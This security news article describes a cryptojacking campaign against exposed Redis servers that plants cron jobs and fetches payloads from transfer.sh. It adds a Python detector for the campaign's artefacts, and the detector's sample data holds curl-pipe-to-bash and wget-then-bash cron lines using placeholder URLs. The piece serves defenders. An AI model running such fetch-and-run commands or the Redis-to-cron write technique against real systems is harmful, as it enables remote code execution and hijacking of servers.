In the past few months, Redis servers have been prominently targeted by several threats, such as the HeadCrab botnet, Redigo, and WatchDog. A new cryptojacking campaign has now been detected targeting exposed Redis deployments, in which attackers abused the public file transfer service transfer[.]sh to hide their malicious activities.
What's happening in the cryptojacking campaign
According to Cado Labs, the attack begins with a scan for the Redis servers exposed to the internet.
For initial access, attackers target exploitable Redis instances, write a cron job into the data store, and then have Redis save its database file into one of the cron job directories.
This database file includes the commands the attackers plan to run on the machine. When the cron scheduler reads this file, it parses the embedded cron entry and runs it, giving the attackers arbitrary code execution on the target machine.
For example, the file may contain a cron job that is executed every minute and runs a cURL command to download a script or payload hosted on the transfer[.]sh service, apparently chosen as an alternative to Pastebin.
The downloaded script is saved as a .cmd file and executed with bash. This ensures that the actual malicious commands are not written to the shell history file.
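As an added defensive example (not code from the Cado Labs write-up), the following Python checker looks for the artefacts this chain leaves behind: an RDB-framed file sitting in a cron directory, a cron line that fetches from transfer.sh and hands the result to bash or a .cmd file, and a Redis `dir` setting that points into a cron directory. The function names, the cron target list and the sample bytes are constructed for illustration; the URLs are placeholders.

```python
import re

# Places the cron scheduler reads (constructed list; extend for your distribution).
CRON_TARGETS = ("/etc/cron.d", "/var/spool/cron", "/var/spool/cron/crontabs", "/etc/crontab")

# Every Redis RDB snapshot starts with the magic "REDIS" followed by a 4-digit version.
RDB_MAGIC = re.compile(rb"^REDIS\d{4}")

# A "line" inside a possibly binary file that invokes curl or wget.
FETCH_LINE = re.compile(rb"[^\n]*\b(curl|wget)\b[^\n]*")

def is_rdb_dump(data: bytes) -> bool:
    """True when the file is RDB-framed, i.e. a Redis SAVE landed here rather than a crontab edit."""
    return bool(RDB_MAGIC.match(data))

def suspicious_cron_lines(data: bytes) -> list:
    """Cron lines that pull from transfer.sh and run the result via bash or a .cmd file."""
    hits = []
    for m in FETCH_LINE.finditer(data):
        line = m.group(0)
        low = line.lower()
        if b"transfer.sh" in low and (b".cmd" in low or re.search(rb"\|\s*(ba)?sh\b", low)):
            hits.append(line.decode("latin-1").strip())
    return hits

def redis_dir_is_cron_target(dump_dir: str) -> bool:
    """True when the value of `CONFIG GET dir` points at a cron directory or crontab."""
    d = dump_dir.rstrip("/")
    return any(d == t or d.startswith(t + "/") for t in CRON_TARGETS)

def assess_cron_file(data: bytes) -> dict:
    """Combine both file-level signals for one file read from a cron directory."""
    lines = suspicious_cron_lines(data)
    return {"rdb_framed": is_rdb_dump(data), "payload_lines": lines,
            "suspicious": is_rdb_dump(data) or bool(lines)}

# Constructed sample: RDB framing around two injected cron entries (URLs are placeholders).
SAMPLE_INFECTED = (
    b"REDIS0009\xfa\tredis-ver\x055.0.7\n"
    b"\n\n* * * * * curl -fsSL https://transfer.sh/PLACEHOLDER/a | bash > /dev/null 2>&1\n"
    b"* * * * * wget -qO /root/.s.cmd https://transfer.sh/PLACEHOLDER/b && bash /root/.s.cmd\n\n"
    b"\xff\x00\x00\x00\x00\x00\x00\x00\x00")
# Constructed sample: an ordinary crontab that also uses curl, to show it is not flagged.
SAMPLE_CLEAN = b"0 3 * * * root /usr/bin/certbot renew\n*/5 * * * * curl -s https://example.com/health\n"

if __name__ == "__main__":
    print(assess_cron_file(SAMPLE_INFECTED))
    print(assess_cron_file(SAMPLE_CLEAN))
```

Running the file-level checks over every file under the cron targets, and the `dir` check against each Redis instance's live configuration, covers both ends of the write path the campaign relies on.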
The payload script
Although the objective of the campaign is to mine cryptocurrency, the script performs several additional tasks to ensure the effective use of the host's resources.
The script disables SELinux and ensures that DNS requests are resolved by public resolvers.
It removes the other cron jobs and clears the cron spool to free up resources. It also runs the sync utility to flush data held in memory to disk, freeing up more RAM.
Moreover, it clears the log files, configures iptables, and terminates any other mining processes running on the machine. Along with additional packages, it then downloads pnscan (a mass network scanning utility) and XMRig.
While XMRig handles the mining-related tasks, such as registering the miner with several mining pools, pnscan is used to find and infect more vulnerable Redis servers.
Concluding notes
Besides targeting exposed Redis servers, attackers are now switching to new open platforms, such as transfer[.]sh, to evade detection. Administrators should actively monitor their Redis servers for misconfigurations and fix them, and should regularly monitor and assess their cloud environment and network traffic for malicious activity.